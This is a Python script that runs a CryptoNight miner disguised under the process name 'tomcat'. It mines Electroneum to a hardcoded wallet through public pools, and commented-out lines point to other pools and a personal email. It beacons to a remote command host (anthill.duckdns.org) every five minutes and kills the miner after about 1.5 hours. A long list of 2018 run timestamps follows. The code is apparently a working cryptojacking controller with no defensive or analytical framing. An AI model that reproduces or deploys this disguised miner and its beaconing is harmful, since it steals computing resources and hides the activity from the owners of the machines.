import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:01.844379
#2018-02-17 17:35:05.159878
#2018-02-17 19:23:04.669491
#2018-02-17 21:14:04.873946
#2018-02-17 22:59:06.168414
#2018-02-18 00:47:04.998659
#2018-02-18 02:34:02.078694
#2018-02-18 04:21:02.125093
#2018-02-18 06:12:04.033834
#2018-02-18 08:02:01.579903
#2018-02-18 09:50:01.640393
#2018-02-18 11:37:04.962047
#2018-02-18 13:22:03.400469
#2018-02-18 15:12:04.517937
#2018-02-18 17:01:06.053185
#2018-02-18 18:48:05.803166
#2018-02-18 20:36:06.200147
#2018-02-18 22:22:04.510953
#2018-02-19 00:11:03.583333
#2018-02-19 01:56:05.903666
#2018-02-19 03:43:02.084529
#2018-02-19 05:28:05.598219
#2018-02-19 07:17:05.020154
#2018-02-19 09:06:02.349529
#2018-02-19 10:54:06.293330
#2018-02-19 12:43:06.908055
#2018-02-19 14:31:02.052923
#2018-02-19 16:19:01.527461
#2018-02-19 18:05:01.729651
#2018-02-19 19:53:07.631488
#2018-02-19 21:42:07.577158
#2018-02-19 23:28:02.086426
#2018-02-20 01:14:03.292457
#2018-02-20 03:04:05.525960
#2018-02-20 04:52:01.516393
#2018-02-20 06:34:08.386552
#2018-02-20 08:19:03.730174
#2018-02-20 10:05:07.425483
#2018-02-20 11:49:06.773167
#2018-02-20 13:38:09.803937
#2018-02-20 15:23:03.838938
#2018-02-20 17:07:10.088762
#2018-02-20 18:57:07.817796
#2018-02-20 20:45:09.643575
#2018-02-20 22:31:01.516696
#2018-02-21 00:12:07.485376
#2018-02-21 01:57:06.767919
#2018-02-21 03:45:07.832192
#2018-02-21 05:35:01.432472
#2018-02-21 07:23:15.962543
#2018-02-21 09:07:06.980542
#2018-02-21 10:55:07.351581
#2018-02-21 12:42:01.782631
#2018-02-21 14:29:08.367604
#2018-02-21 16:14:09.071890
#2018-02-21 18:04:08.088146
#2018-02-21 19:52:07.413604
#2018-02-21 21:40:09.797229
#2018-02-21 23:27:06.935679
#2018-02-22 01:16:03.812595
#2018-02-22 03:04:05.650151
#2018-02-22 04:49:04.720350
#2018-02-22 06:34:01.391061
#2018-02-22 08:22:05.222233
#2018-02-22 10:09:05.000568
#2018-02-22 11:56:01.381757
#2018-02-22 13:41:06.282073
#2018-02-22 15:29:06.626693
#2018-02-22 17:15:07.693044
#2018-02-22 19:03:04.491710
#2018-02-22 20:53:06.081883
#2018-02-22 22:41:02.080887
#2018-02-23 00:28:02.162283
#2018-02-23 02:15:05.966170
#2018-02-23 04:02:04.380505
#2018-02-23 05:48:01.799419
#2018-02-23 07:40:03.979627
#2018-02-23 09:43:01.291787
#2018-02-23 11:48:07.523937
#2018-02-23 13:38:01.606867
#2018-02-23 15:24:08.206063
#2018-02-23 17:14:05.827099
#2018-02-23 18:58:04.405984
#2018-02-23 20:44:08.496025
#2018-02-23 22:32:01.652495
#2018-02-24 00:18:01.296860
#2018-02-24 02:08:07.160920
#2018-02-24 03:58:05.728440
#2018-02-24 05:46:01.540380
#2018-02-24 07:37:07.502716
#2018-02-24 09:23:07.427276
#2018-02-24 11:17:07.888834
#2018-02-24 13:06:01.952619
#2018-02-24 14:57:04.156328
#2018-02-24 16:47:03.571373
#2018-02-24 18:35:01.790321
#2018-02-24 20:23:06.140580
#2018-02-24 22:19:04.086562
#2018-02-25 01:27:03.731800
#2018-02-25 04:01:01.659022
#2018-02-25 07:57:07.320052